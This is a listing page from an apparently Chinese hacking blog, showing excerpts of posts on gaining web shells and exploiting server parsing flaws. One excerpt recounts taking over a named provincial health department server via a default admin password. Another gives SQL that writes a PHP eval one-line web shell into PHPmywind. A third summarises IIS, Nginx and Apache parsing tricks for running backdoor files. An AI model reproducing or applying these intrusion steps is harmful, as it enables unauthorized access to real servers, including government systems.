iick's blog
  • 首页
  • 给我留言
  • 免费shell
  • 技术文章
  • 网站漏洞
  • 工具合集
  • 山西省卫生厅:从一个弱口令到整个服务器

    一个弱口令,导致服务器悲剧。http://www.sxswst.gov.cn/luntan/管理员账号密码默认admin admin888dvbbs8.2.0后台get shell方法百度之ashx写aspx一句话连接得到asp或者aspx...

    技术文章 12-09-17572
  • Iphone渗透工具 WebCruiser

    Iphone渗透工具 WebCruiser

    WebCruiser For Ios:一款方便的移动渗透工具WebCruiser可检测以下漏洞:* GET SQL Injection(Int, String, Search)* POST SQL Injection(Int, String...

    技术文章 12-09-09915
  • iis7.0命令行下列网站的物理目录

    cmd下执行: cd %systemroot%\system32\Inetsrv\ 如果您运行的是64 位Windows,请从%windir%\system32\inetsrv 目录而不是%windir%\syswow64\inetsrv...

    技术文章 12-09-09541
  • PHPmywind 后台拿shell

    PHPmywind 后台拿shell

    网上好像有好多的教程的 用数据库执行Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');sel...

    技术文章 12-09-06698
  • IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结

    [+]IIS 6.0目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码IIS6.0 会将 xx.jpg 解析为 asp 文件。后缀解析:/xx.asp;.jpg...

    技术文章 12-09-06576
  • ‹‹
  • ‹
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • ›
  • ››

Powered By Www.iick.Blog